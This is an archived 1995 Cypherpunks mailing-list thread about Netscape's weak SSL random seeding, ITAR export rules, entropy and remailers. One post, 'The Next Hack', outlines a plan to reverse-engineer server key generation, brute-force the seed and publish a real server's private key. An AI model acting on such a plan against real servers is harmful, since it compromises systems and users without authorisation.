>they cause major losses to Netscape customers.  The result is higher
>security for everyone, and more respect for each other's efforts.  So
>kindly show them a little...

I agree strongly with John.

This whole Netscape thing is good for us, good for Netscape (in the long
run), and good for raising the awareness of the importance of strong
crypto.

It also underscores the need for "tiger teams" to validate software, much
as the Pentium debacle of last fall underscored the need for even more
detailed checking of designs.

It's clear now that 1000 ravenous Cypherpunks, or some fraction of them,
are eager to "crack" the next big product, and this will hopefully make for
better and stronger software.

--Tim May

Notice: With 1000 people on the Cypherpunks list, and many on other lists I
am on, nearly every article I write generates at least one question,
request for more information, dispute with my choice of words, etc. I have
been trying to respond to these, usually privately, but the burden has
become too much, and I no longer plan to respond to trivial or ephemeral
points. If you don't hear from me, this is why. Some requests for pointers
to information will still be handled, but I advise people to learn how to
use the archives and/or search tools.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Thu, 21 Sep 95 06:13:19 PDT
To: cypherpunks@toad.com>
Subject: Re: FROM A FRIEND . . .
In-Reply-To: <43qvn4$mm@calum.csclub.uwaterloo.ca>
Message-ID: <m0svlSw-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


Ian Goldberg writes:

: In article <43qrhf$gd5@tera.mcom.com>,
: Jeff Weinstein <jsw@neon.netscape.com> wrote:
: >  I think that the general opinion of engineers and management here at
: >Netscape is that it would be A Really Good Thing to have our US-only
: >128+ bit version of Netscape Navigator available for download by US
: >citizens and others who are not legally prohibited from using it.
: 
: Who _is_ legally prohibited from using it?  I think there are some countries
: where the very use of crypto is illegal (could someone please list them?),
: but who else?
: 
: There are some people that may be legally prohibited from _obtaining_ it
: from a US site (ITAR yadda), but even so, if JRFurriner downloads
: crypto from company C's site in the US, who's guilty of ITAR-violation?
: Company C for making it available, or JRF for initiating the action
: that caused the bits to be sent out of the country?
: 
:    - Ian "my, I seem to be posting a lot tonight"

Probably both have violated the ITAR, but neither will be actually
prosecuted.  On the other hand, Company C will be threatened and
harassed until it stops making the software available.

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s675570@aix2.uottawa.ca
Date: Thu, 21 Sep 95 06:19:13 PDT
To: Jeff Weinstein <jsw@neon.netscape.com>
Subject: Re: FROM A FRIEND . . .
In-Reply-To: <43r488$met@tera.mcom.com>
Message-ID: <Pine.3.89.9509210842.A64607-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On 21 Sep 1995, Jeff Weinstein wrote:

>   Poor choice of words on my part.  My understanding is that we can not
> export our US-only product, except to canada - for the use of canadian
> citizens.  I also believe that it is illegal for anyone except US citizens,
> permanent residents of the US (green card holders) and Canadian citizens
> to use it, even within the US.  I'm not a lawyer, and I've not read
> all of ITAR myself, so I could be totally wrong...
> 
> 	--Jeff

And from what the folks at the Export Controls division of the Department 
of External Affairs in Ottawa told me, Canadians can't export 
export-controlled American software, including pgp and other freeware, 
without a license. OTOH we can export non-US-origin software license-free
(well freeware for sure, anyway, I didn't get the whole thing quite right). 

Of course there are a few countries for which you would need a license,
and some UN embargoed countries to which you can't make any exports (both 
sets are dictatorships or warzones, so not much net access anyway and the 
crypto laws would make France's look cpunk).

They're also waiting to see what happens to Phil Z. to decide whether or not
ftp's are exports. All the same, if anyone wants an easy and economical
way to get around ITAR, have someone do your crypto software development 
just north of the border (Vancouver's just north of Seattle and close 
enough to Silicon Valley, with excellent net-access) or at least just
publish it here first. Phil could have saved himself an immense amount of 
trouble with a short car ride. You Americans on the list could too.

Wanna nag your bosses some more Jeff? You'd be doing everyone a favor and
get your wish.

You can get "A guide to Canada's export controls" from:

Foreign Affairs and international trade Canada. 
Export controls division
125 Sussex Drive, C-4
P.O. Box 481, Station A
Ottawa, Ontario
K1N 9K6
Fax: (613) 996-9933
Tel: (613) 996-2387

Remember to also ask for the "general software note"

For the West Coasters on the list there's also an address closer to home
(they have addresses in all the major Canadian cities, if anyone wants
to visit them personally, send me a msg and I'll mail you the nearest address)

International Trade Centre
Scotia Tower
900-650 West Georgia Street
P.O. Box 11610
Vancouver, British Columbia
V6B 5H8
Fax: (604) 666-8330
Tel: (604) 666-0434






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pat Farrell" <pfarrell@netcom.com>
Date: Thu, 21 Sep 95 06:28:44 PDT
To: cypherpunks@toad.com
Subject: Re: Patents and trade secrets was: Encryption algorithms used in PrivaSoft
Message-ID: <34057.pfarrell@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


  thad@hammerhead.com (Thaddeus J. Beier)  writes:

> At this point, in this country, a patent is secret until it is issued.

This will change in the US fairly soon. It is fallout of one of the
world-wide trade and tariff treaties -- we have to make our
patent process be more in line with the rest of the world.

One of the big technical challenges that the PTO and PRC have is how
to release in-process patents securely. (PRC is the systems integrator
for the PTO's APS (advanced Patent System) that had all the text and images
of all patents since 1970 online.)

They have even talked about putting patents on the WWW, but actually doing
it is quite a way off in the future.

Pat

Pat Farrell    Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage               #include <standard.disclaimer>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 21 Sep 95 09:18:02 PDT
To: cypherpunks@toad.com
Subject: Re: Entropy vs Random Bits
Message-ID: <ac86dcbd3d021004c67b@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:50 PM 9/20/95, David Van Wie wrote:
>I've been watching the debate and discussion unfold on usable sources of
>random data from environments, user actions, etc.  I have a vocabulary
>question (and something of a bone to pick as a mathematician and physicist).

Well, I was trained as a physicist also, but am completely comfortable with
the Shannon definition of information-theoretic entropy. In fact, through
my readings about entropy in computations (cites below), I now view
traditional thermodynamic entropy as a special case of information theory!

>Usually, the term "entropy" is being used to characterize one of two
>different things: (i) random data, as in "300 bits of entropy," and (ii) the
>"randomness" of data (i.e. high degree of variance in a statistic drawn from
>it), as in "you can find a lot of entropy in the low order bits of a timed
>interval between keystrokes."  I suspect that there are other shades of
>meaning intended in other uses as well.
>
>This is odd.  The term entropy describes an aspect of thermodynamic
>equilibrium in physical systems.  Although sometimes used as a synonym for
>"random," that definition is vernacular, not technical.  In fact, there is
>no meaningful relationship between "entropy" and random data of the type
>described in the postings related to seed values.  In the presence of a
>perfectly suitable and precise mathematical term (i.e. random), why invent
>new terms?  Why use them to mean at least two different things?

Entropy has been used with an information theory context since the 1950s,
by Claude Shannon and others.

I disagree that there is "no meaningful relationship between "entropy" and
random data of the type described in the postings related to seed values."
The bits of entropy we are talking about are the "bits derived from a
physical process or a user action which are effectively from a random
process."

(Granted, the internal thoughts of a user swirling the mouse around are not
quite as "random" as, say, alpha decay, but for all intents and purposes no
"prediction" can be made of the mouse motions, at certain levels of detail,
and the bits derived are in fact effectively random. We are not "living in
a state of sin," to paraphrase Von Neumann, in using these bits and
assuming them to be random.)

Good books on the incredibly fascinating aspects of information theory, and
especially algorithmic information theory:

* Cover and Thomas, "Elements of Information Theory." A good textbook on
information theory, covering gambling (!), prediction, and the
Chaitin-Kolmogoroff outlook.

* Chaitin, Gregory, "Algorithmic Information Theory." A bit dense to read,
and Chaitin has written several more popular accounts for "Scientific
American" and similar places.

* Zurek, Wojciech, editor, "Complexity, Entropy, and the Physics of
Information." This collection of great articles shows the role of entropy
in information theory, and why the thermodynamic definition is essentially
a variant of the more fundamental information-theoretic definition.

Enjoy!

--Tim May


Notice: With 1000 people on the Cypherpunks list, and many on other lists I
am on, nearly every article I write generates at least one question,
request for more information, dispute with my choice of words, etc. I have
been trying to respond to these, usually privately, but the burden has
become too much, and I no longer plan to respond to trivial or ephemeral
points. If you don't hear from me, this is why. Some requests for pointers
to information will still be handled, but I advise people to learn how to
use the archives and/or search tools.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 21 Sep 95 06:33:23 PDT
To: Randy Catoe <Randy@mci.net>
Subject: Re: USA Today on Fear of Credit Cards over Net
In-Reply-To: <01HVIQUUZ6HU8WX6TO@MAILSRV1.PCY.MCI.NET>
Message-ID: <199509211332.JAA01558@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Randy Catoe writes:
> I'm told that the revenue lost to fraud in the
> credit card industry is around .15 percent of the gross purchase value.

That's a giant amount of money in dollars.

> I'm also told that the credit card companies actually face higher costs
> from disputes, i.e. when you call them up and busy out a person to 
> resolve a question on your bill. 

Crypto will also reduce that rate, IMHO.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Thu, 21 Sep 95 09:38:36 PDT
To: vznuri@netcom.com
Subject: Re: netscape bug
Message-ID: <9509211634.AA18472@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


Vlad Nuri said (with some excerpting)

> 
> none of the articles mention that the cracker must have login access
> to the computer that the random numbers are generated on. is this true?
> does the code require knowledge of the PID etc. that can only be obtained
> by a login to the system that the netscape session is running on?

It's been noted on this list before that some programs give uid information
out...sendmail comes to mind...this GREATLY narrows the search for a pid.

> P.M. notes that anywhere there is a data-driven buffer overflow (which
> he suspects are all over netscape) he can get code to execute anything
> he wants. this reminds me of the
> Morris internet worm that ran exactly the same way. it used a
> bug in the finger demon that caused a string buffer overwrite
> (via strcpy, instead of strncpy) to execute customized code.
> 
> my question: I have not seen the specifics of how this works. does
> this require specialized knowledge of the native machine language on the 
> host machine? or is it just used to cause something like a core dump
> to get a command line or something like that?

It requires knowledge of how the stack is set up and of assembler for the
target.  Most people in computer science know at least one assembler and
could easily add enough of another to launch an attack like this.  I did
one once to attack one of my programs as an example for a class.  Please
don't overestimate the difficulty of this attack or underestimate the 
number of folks out there that are qualified to launch it.  It's just that
most of us would rather be writing constructive code:)

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Thu, 21 Sep 95 09:42:02 PDT
To: anonymous@freezone.remailer
Subject: Re: Fraud Fraut Froth
In-Reply-To: <199509211130.HAA20039@light.lightlink.com>
Message-ID: <199509211636.JAA12440@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Or is the banking industry whipping up hysteria among
> purchasers to curb fraud losses? Was the work of those
> graduate students funded by someone -- directly or indirectly?
> If so, by whom? A banking consortium? A high-tech company
> working on some patentable security scheme?
> 

	Do free t-shirts count as funding?

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Thu, 21 Sep 95 06:46:15 PDT
To: cypherpunks@toad.com>
Subject: Re: FROM A FRIEND . . .
In-Reply-To: <43r488$met@tera.mcom.com>
Message-ID: <m0svlyf-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


Jeff Weinstein writes:

:   Poor choice of words on my part.  My understanding is that we can not
: export our US-only product, except to canada - for the use of canadian
: citizens.  I also believe that it is illegal for anyone except US citizens,
: permanent residents of the US (green card holders) and Canadian citizens
: to use it, even within the US.  I'm not a lawyer, and I've not read
: all of ITAR myself, so I could be totally wrong...

There is nothing in U.S. law that prohibits anyone from using a
cryptographic product, much to the frustration of the NSA, FBI, etc.
That is why they try to forbid speaking about it by pretending that
communication of information is exporting something.  There is a law
that forbids exporting munitions without a license and that is the
basis for the ITAR regulations.

The funny thing is that a law forbidding the use of cryptography just
might be constitutional--though I, for one, am convinced that it would
not be--while forbidding communication of information about
cryptography without a license is a blatant violation of the First
Amendment of the United States constitution.

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joe Tardo" <joe_tardo@genmagic.com>
Date: Thu, 21 Sep 95 10:23:32 PDT
To: vznuri@netcom.com>
Subject: Re: netscape bug
Message-ID: <n1400443880.87116@qm.genmagic.com>
MIME-Version: 1.0
Content-Type: text/plain


        Reply to:   RE>netscape bug

"Vladimir Z. Nuri" writes:

>I am willing to bet that the netscape bug would have been fixed quickly if it
>had been quietly brought to their attention, without the blaring media
>lights (I enjoy the media circus as much as the next guy, but on the
>other hand, doing some things quietly may actually advance the cypherpunk
>cause further than by making a noisy hullaballoo in cyberspace).

I can't speak for Netscape in particular, but from bitter personal experience
(in a previous life) I would be more willing to bet that bringing such a flaw
to management's attention would raise the priority a bit to perhaps just below
whatever their equivalent of the 'cut line' is.  The rationale: "we are so
resource limited; can't just keep it under wraps and fix it in the next
release?" just rings in my ears.

I can really empathize with what the developers at Netscape must be going
through, but the 'social good' of raising security flaws to the level of the 
front page of the NYT is hard to deny.  Rather than saying "security through
obscurity is bad" you can point to a precedent of the consequences of being 
found out. 

--Joe






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard Martin" <rmartin@aw.sgi.com>
Date: Thu, 21 Sep 95 07:01:47 PDT
To: jsw@neon.netscape.com>
Subject: Canada & ITAR
In-Reply-To: <Pine.3.89.9509210842.A64607-0100000@aix2.uottawa.ca>
Message-ID: <9509211000.ZM22513@glacius.alias.com>
MIME-Version: 1.0
Content-Type: text/plain


[plug plug plug]

If you're impatient, much of the relevant text of the "Canada's Export
Controls" booklet is available at
http://www.io.org/~samwise/crypto/

frodo =)

--
Richard Martin
Alias|Wavefront - Toronto Office [Co-op Software Developer, Games Team]
rmartin@aw.sgi.com/g4frodo@cdf.toronto.edu      http://www.io.org/~samwise
Trinity College UofT ChemPhysCompSci 9T7+PEY=9T8 Shad Valley Waterloo 1992




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jgrubs@left.webcasters.com (Jim Grubs (W8GRT))
Date: Thu, 21 Sep 95 07:18:16 PDT
To: cypherpunks@toad.com
Subject: Re: USA Today on Fear of Credit Cards over Net
Message-ID: <0u8RBD2w165w@left.webcasters.com>
MIME-Version: 1.0
Content-Type: text/plain


"Perry E. Metzger" <perry@piermont.com> writes:

> 
> Re: The risk of credit cards.
> 
> I suppose that indeed there are large risks elsewhere in the credit
> card system. However, I think that the credit card system itself is
> stupid and insecure and ought to be scrapped -- sending around account
> numbers as magic keys to get payment is a stupid move. It's not
> surprising how large credit card fraud is.

Hence the fast growing popularity of those cash cards. 


--
                        WebCasters(tm)
James C. Grubs                         jgrubs@left.webcasters.com
6817 Maplewood Avenue                         Tel.: 419-882-2697
Sylvania, Oh 43560                             Fax: 419-885-2814
  Internet consulting, HTML programming, Information brokering
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 21 Sep 95 10:04:39 PDT
To: cypherpunks@toad.com
Subject: Persistent Services Needed
Message-ID: <ac86e99240021004ca42@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



One of the problems we're facing with "Cypherpunks" services is that they
are catch-as-catch-can, or, bluntly, "flaky." Archive sites stop being
archives, remailers vanish overnight (*), and other experiments pop up and
then vanish with regularity.

(My favorite example, and one which always makes me smile, is the example
of a remailer in Europe a couple of years ago which became inoperative with
the message: "The foo remailer will stop operating tonight because I have
to take my laptop with me for the summer to Portugal.")

I'm not criticizing these folks. Rather, I'm just saying something pretty
obvious, that _persistence_ is important.

This probably means commercialization, or formalized business
relationships. With such persistent business set-ups, "the show must go
on."

Another reason for digital money.

--Tim May


Notice: With 1000 people on the Cypherpunks list, and many on other lists I
am on, nearly every article I write generates at least one question,
request for more information, dispute with my choice of words, etc. I have
been trying to respond to these, usually privately, but the burden has
become too much, and I no longer plan to respond to trivial or ephemeral
points. If you don't hear from me, this is why. Some requests for pointers
to information will still be handled, but I advise people to learn how to
use the archives and/or search tools.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@Csli.Stanford.EDU>
Date: Thu, 21 Sep 95 10:28:51 PDT
To: Ian Goldberg <iang@cory.EECS.Berkeley.EDU>
Subject: Re: Euro-Clipper
In-Reply-To: <199509210102.SAA15389@cory.EECS.Berkeley.EDU>
Message-ID: <199509211728.KAA19754@Csli.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain



| I don't think I've seen this here (but it was on a bunch of security
| newsgroups...)
| 
|    - Ian

It's time for a European wing of the cypherpunks list.
Europeans - unite!

:-(

And they even have the indecency to immediately propose
to outlaw 'strong encryption for the people' - no grace
period there.


/Christian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 21 Sep 95 10:17:24 PDT
To: cypherpunks@toad.com
Subject: Re: FROM A FRIEND . . . (the joys of boating)
Message-ID: <ac86ebe34202100455ae@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:00 PM 9/21/95, Landon Dyer wrote:

>  here's a possible bullshit wrinkle.  i'm not a lawyer, but one of my
>bosses was, once.
>
>  said boss owned a boat that was of canadian registry.  he was a
>canadian citizen with a green card.  he *claimed* that, even when
>docked in the SF bay area, his boat was technically considered
>canadian territory, due to some maritime law malarky.  US authorities
>theoretically had to go through various hoops to legally board his
>vessel.
>
>  i wouldn't try to halt a SWAT team, or even the local fuzz, with
>this tidbit of legal gaga.  but doing crypto development on such a
>vessel might hold up in court for something as squishy as ITAR.

I'm skeptical of this, as boating friends of mine tell me they are much
more easily boarded by the various water.cops who check for compliance with
navigation laws, with drug laws, with Customs laws, etc.

Within the 3-mile limits, or further out (?), broad discretion is given to
the water.cops who tell you to "Prepare to be boarded."

That a ship or boat is of Panamanian, Liberian, or even Canadian registry
does not seem to have any effect on enforcement of drug-smuggling,
gun-running, waste-dumping, or reckless-maneuvering laws.

I've already expressed my views on the hype surrounding the "This T-Shirt
Has Been Declared to be a Munition" hoopla, so I won't draw the obvious
inference about whether someone wearing an RSA-in-Perl t-shirt while
scrubbing their decks will be shot on sight. (Was Randy Weaver's wife
wearing an illegal t-shirt? Hmmmhhh, many conspiracy angles here!)

--Tim May

Notice: With 1000 people on the Cypherpunks list, and many on other lists I
am on, nearly every article I write generates at least one question,
request for more information, dispute with my choice of words, etc. I have
been trying to respond to these, usually privately, but the burden has
become too much, and I no longer plan to respond to trivial or ephemeral
points. If you don't hear from me, this is why. Some requests for pointers
to information will still be handled, but I advise people to learn how to
use the archives and/or search tools.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Thu, 21 Sep 95 07:31:48 PDT
To: jsw@netscape.com
Subject: PRNG state (and conditioning) (was Re: netscape's response)
In-Reply-To: <199509202031.NAA06951@comsec.com>
Message-ID: <9509211428.AA21108@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


If you are looking for PRNG conditioning code, feel free to snarf code from

	http://www.clark.net/pub/cme/html/ranno.html

I'm assuming your new PRNG has enough state (more than 64 bits) that the
128-bit key (or later, larger keys) is worth its bits.

I'm assuming you solve the problem of finding enough entropy bits for
seeding the PRNG and considering how to keep as much of that entropy as
possible in your PRNG seed (rather than, for a silly example, distilling it
to an unsigned int for driving rand() ).

For example, the state in ranG (from the giveaway code) or in ranM may not
by itself lead to a secure PRNG, but when it drives a one-way function
(e.g., ranH, ranD, ranN) the state is still serving a purpose.  [ranG
keeps 186 bytes of state while ranM keeps 32KB of state.]

 - Carl




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Thu, 21 Sep 95 10:36:16 PDT
To: gnu@toad.com
Subject: Re: netscape's response (source code review)
Message-ID: <9509211732.AA18490@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> It is becoming gradually clearer in cryptanalysis that you can't test
> security of pieces in isolation.  Their interaction with the
> surrounding code and protocols is key to their security.  Ross

I don't think this is a new realization; attacks on crypto systems have
always considered the whole system.

   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@Csli.Stanford.EDU>
Date: Thu, 21 Sep 95 10:35:26 PDT
To: jsw@neon.netscape.com (Jeff Weinstein)
Subject: Re: NSA and Netscape Crack
In-Reply-To: <43qrpq$gd5@tera.mcom.com>
Message-ID: <199509211735.KAA19988@Csli.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain



| Believe it or not we don't like being trashed for
| being stupid all over the net, print media, and TV.  As far as I know
| the NSA have not given us any advice about how to make our system
| stronger.  I've heard rumors that they were quite upset when they
| learned that SSLs 40-bit RC4 was actually 40-bit secret and 88-bit salt.

It is dangerous that the general reaction is that of
'them being stupid', since that will prevent others
from stepping forward and revealing their own 'holes'.

I decree that 'all holes look stupid once located'.

But 'any non-trivially large program is bound to have
holes' => 'all programmers are stupid' (except me,
because I found the hole?)

Jeff, your and Netscape's prompt response to this is
what counts - holes will always be uncovered, it's the
time before they are patched that really matters.

/Christian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Thu, 21 Sep 95 11:30:56 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Persistent Services Needed
In-Reply-To: <ac86e99240021004ca42@[205.199.118.202]>
Message-ID: <199509211825.LAA23576@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	c2.org has been around for more than a year. The recent
publicity we've been getting should hopefully mean that we'll actually
start making a profit and be around for quite some time longer.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdw@lig.net (Stephen D. Williams)
Date: Thu, 21 Sep 95 08:27:41 PDT
To: gnu@toad.com (John Gilmore)
Subject: Re: Export via FTP: who's to blame?  Ask a court!
In-Reply-To: <9509210737.AA10902@toad.com>
Message-ID: <m0svnX7-0009z2C@sdwsys>
MIME-Version: 1.0
Content-Type: text/plain


...
> This is a question that has never been answered by a court.
> 
> Personally I think that the Congress can't constitutionally set up a
> scheme that restricts US citizens from communicating with each other
...

> If some hardy soul wants to set up a nice clean situation, like Phil
> Karn did for the paper-vs-magnetic-media distinction, I'm sure we can
> find some more pro-bono (zero cost) lawyers who'll take the case for
> the fun and notoriety.  You don't have to break the law to get into
> court; Phil didn't, for example.  You make a situation where the law
> restricts you, then sue to have the restriction declared invalid.  And
> if you have ever been in court, it's a lot more fun being the
> Plaintiff than being the Defendant.
> 
> Doing this will take significant time on your part.  Even if the
> lawyers do 95% of the work, you have to talk with them, review what
> they write, explain the details in gory detail, and believe in what
> they're doing for you.  And sometimes do things in a way that they are
> sure is right, even though you yourself aren't sure.  And stick with
> the case even though it would drag on for years through several
> courts.  So it's not something to do lightly.  But it's worth it.  And
> it's a lot safer and easier to enforce your civil rights now, than to
> try to live through the civil war that would follow the slide into
> authoritarian government.
> 
> I'd do this case myself, except that I think we should have few single
> points of failure.  If we spread the work around, it's more likely to
> happen.  And your civil rights are safer, because you yourself have
> learned how to defend them.
> 
> 	John

I recently moved to the DC area (N VA) and might be amenable to a relatively
harmless scenario like this.  (Not that I have much time, but I'm flexible.)

sdw
-- 
Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw@lig.net http://www.lig.net/sdw
Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011
OO/Unix/Comm/NN       ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W
Pres.:Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Thu, 21 Sep 95 11:37:06 PDT
To: cypherpunks@toad.com
Subject: The Next Hack
Message-ID: <199509211832.LAA24086@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	Now that we've seen that Netscape is doing a good job towards
trying to fix the hole that Ian and David have uncovered, it's time to
start looking at new things.

	Given the recent post to the www-security list that was
forwarded here, it seems like just replacing the server may not work
for all the secure servers out there-- keys may have to be replaced as
well. Let's find out.

Proposal for action:

1) Reverse-engineer a server to see if the keygen phase uses
a weak RNG seed. -- if so, determine the exact algorithm.

2) Organize a net-wide search over the space of the RNG seed to 
crack the private key of some well known secure server.

3) Release the private key to the net.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank A Stevenson <frank@funcom.no>
Date: Thu, 21 Sep 95 02:34:47 PDT
To: cypherpunks@toad.com
Subject: Re: netscape's response
In-Reply-To: <9509201835.ZM154@tofuhut>
Message-ID: <Pine.SGI.3.91.950921112257.28289C@odin>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 20 Sep 1995, Jeff Weinstein wrote:

> NOTE: my first attempt to send this bounced at toad.com
> 
> On Sep 20,  5:16pm, David_A Wagner wrote:
> > Subject: Re: netscape's response
> > In article <9509200139.ZM206@tofuhut> you write:
> > > On Sep 20, 12:29am, Christian Wettergren wrote:
> > > > One wild idea that I just got was to have servers and clients exchange
> > > > random numbers (not seeds of course), in a kind of chaining way. Since
> > > > most viewers connect to a number of servers, and all servers are
> > > > connected to by many clients, they would mix "randomness sources" with
> > > > each other, making it impossible to observe the local environment
> > > > only. And the random values would of course be encrypted under the
> > > > session key, making it impossible to "watch the wire".
> > > 
> > >   Wow, this is a great idea!!
> > 
> > Are you quite sure this is a good idea?
> > 
> > I'd be very scared of it.  In particular, it opens up the chance for
> > adversaries to feed you specially chosen numbers to pollute your seeds.

Suppose you divide your random material into several parts:

A: Userinput (updated from Keystroke timing etc.)
B: 'Random' numbers from remote server
C: Time, pid, ppid, etc..
D: other...

Whenever you want to incorporate new data into B you could do something like:
B = B xor Hash (A,B,C,D, fresh 'random')

This would be very hard to pollute with well chosen input.

> 
>   What I should have said is that it's a very interesting idea.  Given
> current perceptions of netscape, I should have made clear that I
> wouldn't do something like this without getting a lot more discussion
> and review of possible dangers and how to avoid them.  I certainly
> can't fault anyone for wondering if we would just implement this
> without thinking it through, given recent events.
> 

  Frank





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joe Tardo" <joe_tardo@genmagic.com>
Date: Thu, 21 Sep 95 11:59:48 PDT
To: "Jeff Weinstein" <jsw@netscape.com>
Subject: Re: Please send me SSL prob
Message-ID: <n1400438055.58002@qm.genmagic.com>
MIME-Version: 1.0
Content-Type: text/plain


        Reply to:   RE>>Please send me SSL problems...

Jeff:

The name chosen for SSL was, perhaps, unfortunate and misleading, but should
not get in the way of the kind of service it provides.  I keep combing the
spec looking for socket-like api's, and so far have not found any  :-).

> I've looked at
>what it takes to make some existing protocols work with SSL, and I'm not
>convinced that it's always appropriate.  For example FTP and RCMD use
>multiple connections, which is a royal pain.

Doesn't HTTP use a new connection for every GET?

> If a secure IP standard emerges that is widely deployed and provides
>similar services, I don't see why SSL couldn't just go away (this is my
